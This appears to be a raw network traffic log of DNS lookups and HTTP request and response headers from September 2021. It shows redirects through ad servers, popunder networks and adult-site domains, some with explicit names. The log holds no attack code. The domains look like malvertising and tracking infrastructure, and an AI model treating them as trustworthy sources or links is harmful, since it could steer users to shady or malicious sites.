Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://alfad.pro/go/266933/628713RequestGET /go/266933/628713 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:50 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNSfuckteen.xyzRequestfuckteen.xyzIN AResponsefuckteen.xyzIN A207.180.237.38
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
GEThttp://alfad.pro/ad/ad?p=266933&w=628928&t=2c075c7e91b0c3bf&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=628928&t=2c075c7e91b0c3bf&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/628928
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:53:56 GMT
Location: https://go.exrtbsrv.com/r.php?i=88834607&p=p39451656&s=s3&c=aUpTMFlyVVE4TWJ4RGJaazNLdXNkdz09#pc237540
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNS789ff.liveRequest789ff.liveIN AResponse789ff.liveIN A212.107.18.203
-
GEThttp://fuckteen.xyz/goads.phpRequestGET /goads.php HTTP/1.1
Host: fuckteen.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:53:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSbaity.ruRequestbaity.ruIN AResponsebaity.ruIN A212.107.18.203
-
DNSjs.wpadmngr.comRequestjs.wpadmngr.comIN AResponsejs.wpadmngr.comIN CNAMEcdn28786515.ahacdn.mecdn28786515.ahacdn.meIN A213.174.135.25cdn28786515.ahacdn.meIN A213.174.135.24
-
GEThttp://alfad.pro/go/266933/628698RequestGET /go/266933/628698 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:53:56 GMT
Server: nginx
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNS112.t.keepitpumpin.ioRequest112.t.keepitpumpin.ioIN AResponse112.t.keepitpumpin.ioIN A212.83.164.37
-
DNSonsanothi.bizRequestonsanothi.bizIN AResponseonsanothi.bizIN A52.222.139.9onsanothi.bizIN A52.222.139.93onsanothi.bizIN A52.222.139.29onsanothi.bizIN A52.222.139.108
-
DNSbongacams7.comRequestbongacams7.comIN AResponsebongacams7.comIN A94.199.249.164bongacams7.comIN A185.75.253.110
-
DNSyesdd.liveRequestyesdd.liveIN AResponseyesdd.liveIN A212.107.18.203
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSs.optnx.comRequests.optnx.comIN AResponses.optnx.comIN CNAMEtk6if76q.ab1n.nettk6if76q.ab1n.netIN A95.211.229.246tk6if76q.ab1n.netIN A95.211.229.245
-
DNSjavsex.usRequestjavsex.usIN AResponsejavsex.usIN A207.180.237.38
-
DNSjs.wpadmngr.comRequestjs.wpadmngr.comIN AResponsejs.wpadmngr.comIN CNAMEcdn28786515.ahacdn.mecdn28786515.ahacdn.meIN A213.174.135.24cdn28786515.ahacdn.meIN A213.174.135.25
-
DNSm1.firon.xyzRequestm1.firon.xyzIN AResponsem1.firon.xyzIN A173.236.118.100
-
GEThttp://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGsxTUh3M05qa3hZbVl3TkdGaE9EUXhOemhoWW1Vd1pUZ3hZV0UxT1dZNU9UazBNdy0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXZzZXgsdXMsaW5kZXgsaHRtJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablR1bXFkSzZWMHJxcmJYU3VsZEs2WjBycFhTdWxkTTZWMHJwWFdXeTNYVlhXMHk2VjBUMDAyMjUzVzdjYWNhN1c2M1c3dXQxcDJybG1vc3IwMnI0cHJvMmw0NDI0enQwbHN1NDN1ZGRSTlhWUTd6TkJkMVJuSzV6cFhTdWxkVFM2VjBycFhTdWxjSDJ8aHR0cHwxNTQuNjEuNzEuNTF8VVNBfDQxfGFkLW1hdmVuLmNvbXw1MzEyOTR8NDMwNjc1fDgxNjI2MXwzNTc2NDExfDUwOHw0NTcwMDA2fDU4OTE5MDE0fDE1fDJ8MHwwfDU4OHw5MzE2NTN8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDc4MDk5NTk4NDBiNjMyNDQ4OGE5OGRmYmZjZDhjOThlfDhjNGQ2MDEzNzZiZDZmNDYzZDBmZmRmYThiMDc5ZmU5fDF8MHxqYXZzZXgudXN8MHwwfDB8MC4xNXwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwyfDcyMHx8MHwwfDB8NDR8MHwwfDF8MHxPS3xjNDZhYzQxMGI4ZDczMTY3Mjc0ZDgwMGE1ZDE2N2VhYg--RequestGET /cimp.php?data=TVRZek1Ea3lNVGsxTUh3M05qa3hZbVl3TkdGaE9EUXhOemhoWW1Vd1pUZ3hZV0UxT1dZNU9UazBNdy0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1qYXZzZXgsdXMsaW5kZXgsaHRtJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablR1bXFkSzZWMHJxcmJYU3VsZEs2WjBycFhTdWxkTTZWMHJwWFdXeTNYVlhXMHk2VjBUMDAyMjUzVzdjYWNhN1c2M1c3dXQxcDJybG1vc3IwMnI0cHJvMmw0NDI0enQwbHN1NDN1ZGRSTlhWUTd6TkJkMVJuSzV6cFhTdWxkVFM2VjBycFhTdWxjSDJ8aHR0cHwxNTQuNjEuNzEuNTF8VVNBfDQxfGFkLW1hdmVuLmNvbXw1MzEyOTR8NDMwNjc1fDgxNjI2MXwzNTc2NDExfDUwOHw0NTcwMDA2fDU4OTE5MDE0fDE1fDJ8MHwwfDU4OHw5MzE2NTN8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDc4MDk5NTk4NDBiNjMyNDQ4OGE5OGRmYmZjZDhjOThlfDhjNGQ2MDEzNzZiZDZmNDYzZDBmZmRmYThiMDc5ZmU5fDF8MHxqYXZzZXgudXN8MHwwfDB8MC4xNXwxfDB8ZXhjaGFuZ2VfbGlua3wwfDB8MHwtMXwwfDB8fHwyfDcyMHx8MHwwfDB8NDR8MHwwfDF8MHxPS3xjNDZhYzQxMGI4ZDczMTY3Mjc0ZDgwMGE1ZDE2N2VhYg-- HTTP/1.1
Host: s.optnx.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://javsex.us/index.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __uvt=a%3A1%3A%7Bi%3A0%3Bs%3A33%3A%226135e538f19b57.766097531896998388%22%3B%7D; expires=Wed, 06 Sep 2023 09:54:00 GMT; path=; domain=.optnx.com;
Content-Encoding: gzip
-
DNSpuss8.usRequestpuss8.usIN AResponsepuss8.usIN A207.180.237.38
-
DNSlangke.fr.amRequestlangke.fr.amIN AResponselangke.fr.amIN A212.107.18.203
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
GEThttp://kiynew.com/cuload?a=1&e=aeyJwaWQiOjEwNzk3MjUsInNpZCI6MTEwNjA5Mywid2lkIjoyMzA4MDAsImQiOiJmaW5hbmNlcGFyay54eXoiLCJsaSI6MX0=&tz=8&if=0RequestGET /cuload?a=1&e=aeyJwaWQiOjEwNzk3MjUsInNpZCI6MTEwNjA5Mywid2lkIjoyMzA4MDAsImQiOiJmaW5hbmNlcGFyay54eXoiLCJsaSI6MX0=&tz=8&if=0 HTTP/1.1
Host: kiynew.com
Connection: keep-alive
Origin: http://financepark.xyz
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Referer: http://financepark.xyz/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 06 Sep 2021 09:54:00 GMT
Content-Length: 0
Connection: keep-alive
-
GEThttp://onsanothi.biz/redirect?tid=930167RequestGET /redirect?tid=930167 HTTP/1.1
Host: onsanothi.biz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xxxlist.vip/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csu=5b9b6047-914b-457e-893b-c56be323a6bc
-
GEThttp://alfad.pro/ad/ad?p=266933&w=622594&t=c210271cfb9777fa&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=622594&t=c210271cfb9777fa&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/622594
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:01 GMT
Location: https://m1.firon.xyz/?s1=0&utm_campaign=Remnantnewtest&utm_medium=c8c78a53dcf735c1c683d5fc856523882fab7c4c
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://javsex.us/goung.phpRequestGET /goung.php HTTP/1.1
Host: javsex.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; GWX:RESERVED)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSyiopse.comRequestyiopse.comIN AResponseyiopse.comIN A172.67.199.171yiopse.comIN A104.21.21.177
-
GEThttp://puss8.us/index.htmRequestGET /index.htm HTTP/1.1
Host: puss8.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; ASU2JS; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:01 GMT
Content-Type: text/html
Content-Length: 282
Last-Modified: Wed, 07 Apr 2021 07:46:28 GMT
Connection: keep-alive
ETag: "606d6354-11a"
Accept-Ranges: bytes
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNShornytit.usRequesthornytit.usIN AResponsehornytit.usIN A207.180.237.38
-
DNStubestar.xyzRequesttubestar.xyzIN AResponsetubestar.xyzIN A207.180.237.38
-
GEThttp://alfad.pro/ad/ad?p=266933&w=628701&t=be5e330d2dfc758e&r=&vw=887&vh=537RequestGET /ad/ad?p=266933&w=628701&t=be5e330d2dfc758e&r=&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/628701
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:54:01 GMT
Location: https://www.fpcpopunder.com/popunder/popunder.cgi?program=light&account=pub_fpc_popcash&track=A
Server: nginx
Content-Length: 0
Connection: keep-alive
-
GEThttp://hornytit.us/index.htmRequestGET /index.htm HTTP/1.1
Host: hornytit.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:01 GMT
Content-Type: text/html
Content-Length: 282
Last-Modified: Tue, 13 Apr 2021 07:57:56 GMT
Connection: keep-alive
ETag: "60754f04-11a"
Accept-Ranges: bytes
-
GEThttp://tubestar.xyz/goadv.phpRequestGET /goadv.php HTTP/1.1
Host: tubestar.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSnl.ask.comRequestnl.ask.comIN AResponsenl.ask.comIN CNAMEaskmedia.map.fastly.netaskmedia.map.fastly.netIN A151.101.2.114askmedia.map.fastly.netIN A151.101.66.114askmedia.map.fastly.netIN A151.101.130.114askmedia.map.fastly.netIN A151.101.194.114
-
DNSclientservices.googleapis.comRequestclientservices.googleapis.comIN AResponseclientservices.googleapis.comIN A142.251.36.3
-
DNSnl.ask.comRequestnl.ask.comIN AResponsenl.ask.comIN CNAMEaskmedia.map.fastly.netaskmedia.map.fastly.netIN A151.101.2.114askmedia.map.fastly.netIN A151.101.66.114askmedia.map.fastly.netIN A151.101.130.114askmedia.map.fastly.netIN A151.101.194.114
-
DNS789ff.liveRequest789ff.liveIN AResponse789ff.liveIN A212.107.18.203
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSfuckteen.xyzRequestfuckteen.xyzIN AResponsefuckteen.xyzIN A207.180.237.38
-
DNSjs.wpadmngr.comRequestjs.wpadmngr.comIN AResponsejs.wpadmngr.comIN CNAMEcdn28786515.ahacdn.mecdn28786515.ahacdn.meIN A213.174.135.25cdn28786515.ahacdn.meIN A213.174.135.24
-
DNShotjav.ruRequesthotjav.ruIN AResponsehotjav.ruIN A167.86.103.60
-
DNSlangke.fr.amRequestlangke.fr.amIN AResponselangke.fr.amIN A212.107.18.203
-
DNSdq06u9lt5akr2.cloudfront.netRequestdq06u9lt5akr2.cloudfront.netIN AResponsedq06u9lt5akr2.cloudfront.netIN A52.222.137.166dq06u9lt5akr2.cloudfront.netIN A52.222.137.10dq06u9lt5akr2.cloudfront.netIN A52.222.137.133dq06u9lt5akr2.cloudfront.netIN A52.222.137.81
-
DNSxml.bid-engine.comRequestxml.bid-engine.comIN AResponsexml.bid-engine.comIN CNAMEad-maven.xml.ak-is2.netad-maven.xml.ak-is2.netIN A198.134.116.29
-
GEThttp://alfad.pro/go/266933/627004RequestGET /go/266933/627004 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:54:06 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://fuckteen.xyz/goadv.phpRequestGET /goadv.php HTTP/1.1
Host: fuckteen.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MDDRJS; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://dq06u9lt5akr2.cloudfront.net/?tluqd=937367RequestGET /?tluqd=937367 HTTP/1.1
Host: dq06u9lt5akr2.cloudfront.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: */*
Referer: http://mphotos.xyz/ff.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
-
GEThttp://hotjav.ru/eva.htmlRequestGET /eva.html HTTP/1.1
Host: hotjav.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:06 GMT
Content-Type: text/html
Content-Length: 123
Last-Modified: Sat, 04 Sep 2021 00:26:10 GMT
Connection: keep-alive
ETag: "6132bd22-7b"
Accept-Ranges: bytes
-
DNSwww.soloprotect.comRequestwww.soloprotect.comIN AResponsewww.soloprotect.comIN A188.94.75.241
-
DNSvexacion.comRequestvexacion.comIN AResponsevexacion.comIN A139.45.197.236
-
DNSwww.soloprotect.comRequestwww.soloprotect.comIN AResponsewww.soloprotect.comIN A188.94.75.241
-
DNSwww.bing.comRequestwww.bing.comIN AResponsewww.bing.comIN CNAMEa-0001.a-afdentry.net.trafficmanager.neta-0001.a-afdentry.net.trafficmanager.netIN CNAMEwww-bing-com.dual-a-0001.a-msedge.netwww-bing-com.dual-a-0001.a-msedge.netIN CNAMEdual-a-0001.dc-msedge.netdual-a-0001.dc-msedge.netIN A131.253.33.200dual-a-0001.dc-msedge.netIN A13.107.22.200
-
DNStags.srv.stackadapt.comRequesttags.srv.stackadapt.comIN AResponsetags.srv.stackadapt.comIN A52.202.228.151tags.srv.stackadapt.comIN A54.165.186.74tags.srv.stackadapt.comIN A52.205.8.225
-
GEThttp://vexacion.com/afu.php?id=1294231RequestGET /afu.php?id=1294231 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; oaidts=1630921094
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:11 GMT
Content-Type: text/html; charset=utf8
Transfer-Encoding: chunked
Connection: keep-alive
X-Trace-Id: b7e67c504289e2619c51739ea1442984
Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
Access-Control-Max-Age: 86400
Pragma: no-cache
Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 11 Jan 1994 10:00:00 GMT
Timing-Allow-Origin: *
Set-Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; expires=Tue, 06 Sep 2022 09:54:11 GMT; path=/
Set-Cookie: oaidts=1630921094; expires=Tue, 06 Sep 2022 09:54:11 GMT; path=/
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
Content-Encoding: gzip
-
DNS789ff.fr.amRequest789ff.fr.amIN AResponse789ff.fr.amIN A212.107.18.203
-
DNSxnude.usRequestxnude.usIN AResponsexnude.usIN A207.180.237.38
-
GEThttp://xnude.us/index.htmlRequestGET /index.html HTTP/1.1
Host: xnude.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:54:11 GMT
Content-Type: text/html
Content-Length: 319
Last-Modified: Thu, 03 Jun 2021 02:03:57 GMT
Connection: keep-alive
ETag: "60b8388d-13f"
Accept-Ranges: bytes
-
DNStechadsmedia.comRequesttechadsmedia.comIN AResponsetechadsmedia.comIN A51.91.200.241
-
DNSds8tuylnjknkd.cloudfront.netRequestds8tuylnjknkd.cloudfront.netIN AResponseds8tuylnjknkd.cloudfront.netIN A52.222.137.45ds8tuylnjknkd.cloudfront.netIN A52.222.137.167ds8tuylnjknkd.cloudfront.netIN A52.222.137.149ds8tuylnjknkd.cloudfront.netIN A52.222.137.60
-
DNSeu.dspultra.comRequesteu.dspultra.comIN AResponseeu.dspultra.comIN A139.45.197.201eu.dspultra.comIN A139.45.197.203
-
DNStxxx.ukRequesttxxx.ukIN AResponsetxxx.ukIN A167.86.121.34
-
DNSwww.baidu.comRequestwww.baidu.comIN AResponsewww.baidu.comIN CNAMEwww.a.shifen.comwww.a.shifen.comIN CNAMEwww.wshifen.comwww.wshifen.comIN A104.193.88.77www.wshifen.comIN A104.193.88.123
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSplive.xyzRequestplive.xyzIN AResponseplive.xyzIN A194.59.164.58
-
DNSmaswo.ruRequestmaswo.ruIN AResponsemaswo.ruIN A212.107.18.203
-
DNSsexybride.xyzRequestsexybride.xyzIN AResponsesexybride.xyzIN A194.59.164.58
-
GEThttp://eu.dspultra.com/api/win_request?ad_scheme=1&p=27402603-0a83-4844-9d76-401b1cb06e84&hil=2&ng=1&ix=0&pt=0&np=1&nw=0&nb=1&sw=1280&sh=800&pl=http%3A%2F%2Feu.dspultra.com%2Fapi%2Fsubmit_form_request%3Fp%3D27402603-0a83-4844-9d76-401b1cb06e84%26ts%3D1630921882%26z%3D4345477&wy=171&wx=1152&ww=684&wh=425&cw=684&wiw=684&wih=425&wfc=0&sah=514&navlng=en-US&rf=http%3A%2F%2Fweightlose.tw%2Findex.html&wgl=RequestGET /api/win_request?ad_scheme=1&p=27402603-0a83-4844-9d76-401b1cb06e84&hil=2&ng=1&ix=0&pt=0&np=1&nw=0&nb=1&sw=1280&sh=800&pl=http%3A%2F%2Feu.dspultra.com%2Fapi%2Fsubmit_form_request%3Fp%3D27402603-0a83-4844-9d76-401b1cb06e84%26ts%3D1630921882%26z%3D4345477&wy=171&wx=1152&ww=684&wh=425&cw=684&wiw=684&wih=425&wfc=0&sah=514&navlng=en-US&rf=http%3A%2F%2Fweightlose.tw%2Findex.html&wgl= HTTP/1.1
Host: eu.dspultra.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
